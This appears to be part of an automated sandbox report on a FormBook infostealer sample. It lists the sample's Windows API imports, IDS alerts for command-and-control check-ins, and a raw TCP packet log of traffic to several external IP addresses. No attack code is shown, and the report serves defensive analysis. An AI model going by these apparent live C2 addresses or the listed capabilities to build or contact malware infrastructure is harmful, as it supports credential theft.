GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                                                                                    USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                                                                    GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                    ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                    ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                                                                    OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

                                                                                                                    Possible Origin

                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                    EnglishGreat Britain
                                                                                                                    EnglishUnited States

                                                                                                                    Network Behavior

                                                                                                                    Suricata IDS Alerts

                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-10-24T05:07:05.833523+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497733.33.130.19080TCP
                                                                                                                    2024-10-24T05:07:21.863488+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44986375.2.103.2380TCP
                                                                                                                    2024-10-24T05:07:24.527124+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44987775.2.103.2380TCP
                                                                                                                    2024-10-24T05:07:27.053173+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44989375.2.103.2380TCP
                                                                                                                    2024-10-24T05:07:29.719563+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44990575.2.103.2380TCP
                                                                                                                    2024-10-24T05:07:35.644896+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449938161.97.168.24580TCP
                                                                                                                    2024-10-24T05:07:38.176637+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449953161.97.168.24580TCP
                                                                                                                    2024-10-24T05:07:40.713014+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449967161.97.168.24580TCP
                                                                                                                    2024-10-24T05:07:43.225697+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449983161.97.168.24580TCP
                                                                                                                    2024-10-24T05:07:49.416387+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001165.21.196.9080TCP
                                                                                                                    2024-10-24T05:07:52.010166+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001265.21.196.9080TCP
                                                                                                                    2024-10-24T05:07:54.566470+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001365.21.196.9080TCP
                                                                                                                    2024-10-24T05:07:57.197651+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45001465.21.196.9080TCP
                                                                                                                    2024-10-24T05:08:03.685063+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450015107.148.177.20080TCP
                                                                                                                    2024-10-24T05:08:06.229021+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450016107.148.177.20080TCP
                                                                                                                    2024-10-24T05:08:08.776049+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450017107.148.177.20080TCP
                                                                                                                    2024-10-24T05:08:11.307022+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450018107.148.177.20080TCP
                                                                                                                    2024-10-24T05:08:17.697644+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45001991.212.26.580TCP
                                                                                                                    2024-10-24T05:08:20.260173+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002091.212.26.580TCP
                                                                                                                    2024-10-24T05:08:22.822828+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002191.212.26.580TCP
                                                                                                                    2024-10-24T05:08:25.369643+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45002291.212.26.580TCP
                                                                                                                    2024-10-24T05:08:31.105671+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500233.33.130.19080TCP
                                                                                                                    2024-10-24T05:08:33.649175+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500243.33.130.19080TCP
                                                                                                                    2024-10-24T05:08:36.207471+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500253.33.130.19080TCP
                                                                                                                    2024-10-24T05:08:38.749515+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500263.33.130.19080TCP
                                                                                                                    2024-10-24T05:08:45.117275+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450027154.23.184.19480TCP
                                                                                                                    2024-10-24T05:08:47.744778+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450028154.23.184.19480TCP
                                                                                                                    2024-10-24T05:08:50.291549+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450029154.23.184.19480TCP
                                                                                                                    2024-10-24T05:08:52.838495+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450030154.23.184.19480TCP
                                                                                                                    2024-10-24T05:08:58.751482+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003163.250.47.5780TCP
                                                                                                                    2024-10-24T05:09:01.315065+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003263.250.47.5780TCP
                                                                                                                    2024-10-24T05:09:03.869861+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003363.250.47.5780TCP
                                                                                                                    2024-10-24T05:09:06.409600+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45003463.250.47.5780TCP
                                                                                                                    2024-10-24T05:09:12.550119+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450035104.21.78.10480TCP
                                                                                                                    2024-10-24T05:09:15.127587+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450036104.21.78.10480TCP
                                                                                                                    2024-10-24T05:09:17.648214+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450037104.21.78.10480TCP
                                                                                                                    2024-10-24T05:09:20.182535+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450038104.21.78.10480TCP
                                                                                                                    2024-10-24T05:09:26.712802+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003968.66.226.11680TCP
                                                                                                                    2024-10-24T05:09:29.234986+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004068.66.226.11680TCP
                                                                                                                    2024-10-24T05:09:31.780953+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004168.66.226.11680TCP
                                                                                                                    2024-10-24T05:09:33.834400+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45004268.66.226.11680TCP
                                                                                                                    2024-10-24T05:09:39.598001+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004313.248.169.4880TCP
                                                                                                                    2024-10-24T05:09:42.147205+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004413.248.169.4880TCP
                                                                                                                    2024-10-24T05:09:44.660193+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004513.248.169.4880TCP
                                                                                                                    2024-10-24T05:09:47.242547+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45004613.248.169.4880TCP
                                                                                                                    2024-10-24T05:09:52.918186+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500473.33.130.19080TCP
                                                                                                                    2024-10-24T05:09:55.447492+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500483.33.130.19080TCP
                                                                                                                    2024-10-24T05:09:58.025622+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500493.33.130.19080TCP
                                                                                                                    2024-10-24T05:10:00.778879+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500503.33.130.19080TCP
                                                                                                                    2024-10-24T05:10:06.450223+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500513.33.130.19080TCP
                                                                                                                    2024-10-24T05:10:08.993983+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500523.33.130.19080TCP
                                                                                                                    2024-10-24T05:10:11.549562+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500533.33.130.19080TCP
                                                                                                                    2024-10-24T05:10:14.590801+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500543.33.130.19080TCP

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Oct 24, 2024 05:07:05.188875914 CEST4977380192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:07:05.194566965 CEST80497733.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:05.194845915 CEST4977380192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:07:05.202687025 CEST4977380192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:07:05.208282948 CEST80497733.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:05.833090067 CEST80497733.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:05.833292961 CEST80497733.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:05.833523035 CEST4977380192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:07:05.836081028 CEST4977380192.168.2.43.33.130.190
                                                                                                                    Oct 24, 2024 05:07:05.841598988 CEST80497733.33.130.190192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:21.220949888 CEST4986380192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:21.226654053 CEST804986375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:21.226744890 CEST4986380192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:21.235543966 CEST4986380192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:21.241142988 CEST804986375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:21.863424063 CEST804986375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:21.863487959 CEST4986380192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:22.744611025 CEST4986380192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:22.750190973 CEST804986375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:23.819245100 CEST4987780192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:23.827471018 CEST804987775.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:23.827593088 CEST4987780192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:23.874382973 CEST4987780192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:23.879810095 CEST804987775.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:24.527021885 CEST804987775.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:24.527123928 CEST4987780192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:25.401155949 CEST4987780192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:25.407089949 CEST804987775.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.419121027 CEST4989380192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:26.425160885 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.425502062 CEST4989380192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:26.433362961 CEST4989380192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:26.439445019 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.439507961 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.439538002 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.439572096 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.445074081 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.445117950 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.445146084 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.445173979 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:26.445202112 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:27.052867889 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:27.053173065 CEST4989380192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:27.947740078 CEST4989380192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:27.954328060 CEST804989375.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:29.020641088 CEST4990580192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:29.026498079 CEST804990575.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:29.026602983 CEST4990580192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:29.053287983 CEST4990580192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:29.059082031 CEST804990575.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:29.688046932 CEST804990575.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:29.719446898 CEST804990575.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:29.719563007 CEST4990580192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:29.720356941 CEST4990580192.168.2.475.2.103.23
                                                                                                                    Oct 24, 2024 05:07:29.726100922 CEST804990575.2.103.23192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:34.757886887 CEST4993880192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:34.763264894 CEST8049938161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:34.763358116 CEST4993880192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:34.772094965 CEST4993880192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:34.777800083 CEST8049938161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:35.644646883 CEST8049938161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:35.644709110 CEST8049938161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:35.644896030 CEST4993880192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:35.789664984 CEST8049938161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:35.789743900 CEST4993880192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:36.275815964 CEST4993880192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:37.293979883 CEST4995380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:37.299680948 CEST8049953161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:37.299789906 CEST4995380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:37.308964968 CEST4995380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:37.314882994 CEST8049953161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:38.176356077 CEST8049953161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:38.176409960 CEST8049953161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:38.176636934 CEST4995380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:38.320411921 CEST8049953161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:38.320499897 CEST4995380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:38.822731018 CEST4995380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:39.841115952 CEST4996780192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:39.847037077 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.847129107 CEST4996780192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:39.856246948 CEST4996780192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:39.862169981 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.862211943 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.862240076 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.862268925 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.862322092 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.862349987 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.862376928 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.862869978 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:39.862898111 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:40.712903976 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:40.712956905 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:40.713013887 CEST4996780192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:40.842545986 CEST8049967161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:40.843997955 CEST4996780192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:41.369765997 CEST4996780192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:42.387764931 CEST4998380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:42.393177986 CEST8049983161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:42.393276930 CEST4998380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:42.399188042 CEST4998380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:42.405255079 CEST8049983161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:43.225492954 CEST8049983161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:43.225532055 CEST8049983161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:43.225567102 CEST8049983161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:43.225600004 CEST8049983161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:43.225697041 CEST4998380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:43.225697041 CEST4998380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:43.349102020 CEST8049983161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:43.349257946 CEST4998380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:43.349981070 CEST4998380192.168.2.4161.97.168.245
                                                                                                                    Oct 24, 2024 05:07:43.355384111 CEST8049983161.97.168.245192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:48.469611883 CEST5001180192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:48.476108074 CEST805001165.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:48.476368904 CEST5001180192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:48.550262928 CEST5001180192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:48.556273937 CEST805001165.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:49.376538038 CEST805001165.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:49.416387081 CEST5001180192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:49.525388002 CEST805001165.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:49.525726080 CEST5001180192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:50.057034016 CEST5001180192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:51.103931904 CEST5001280192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:51.109760046 CEST805001265.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:51.109855890 CEST5001280192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:51.169250011 CEST5001280192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:51.175199032 CEST805001265.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:51.965693951 CEST805001265.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:52.010165930 CEST5001280192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:52.096380949 CEST805001265.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:52.096465111 CEST5001280192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:52.682143927 CEST5001280192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:53.703777075 CEST5001380192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:53.709924936 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.710084915 CEST5001380192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:53.725924015 CEST5001380192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:53.731859922 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.731961966 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.731992960 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.732022047 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.732074976 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.732104063 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.732131958 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.732160091 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:53.732192993 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:54.566273928 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:54.566469908 CEST5001380192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:55.229217052 CEST5001380192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:55.235456944 CEST805001365.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:56.249533892 CEST5001480192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:56.255517960 CEST805001465.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:56.255635023 CEST5001480192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:56.262965918 CEST5001480192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:56.268767118 CEST805001465.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:57.147090912 CEST805001465.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:57.197650909 CEST5001480192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:57.294240952 CEST805001465.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:07:57.294631958 CEST5001480192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:57.295335054 CEST5001480192.168.2.465.21.196.90
                                                                                                                    Oct 24, 2024 05:07:57.301153898 CEST805001465.21.196.90192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:03.084068060 CEST5001580192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:03.089929104 CEST8050015107.148.177.200192.168.2.4
                                                                                                                    Oct 24, 2024 05:08:03.090147972 CEST5001580192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:03.102500916 CEST5001580192.168.2.4107.148.177.200
                                                                                                                    Oct 24, 2024 05:08:03.108454943 CEST8050015107.148.177.200192.168.2.4
